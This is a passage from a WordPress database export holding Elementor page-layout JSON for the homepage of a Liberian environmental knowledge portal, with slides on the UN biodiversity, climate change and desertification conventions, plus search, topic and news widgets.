Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(31587,4469,'_elementor_version','3.4.0'),(31588,4469,'_elementor_template_type','wp-page'),(31589,4469,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(31591,4469,'_elementor_pro_version','3.3.6'),(31593,4470,'_wp_page_template','default'),(31594,4470,'_elementor_edit_mode','builder'),(31595,4470,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/document-library\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, 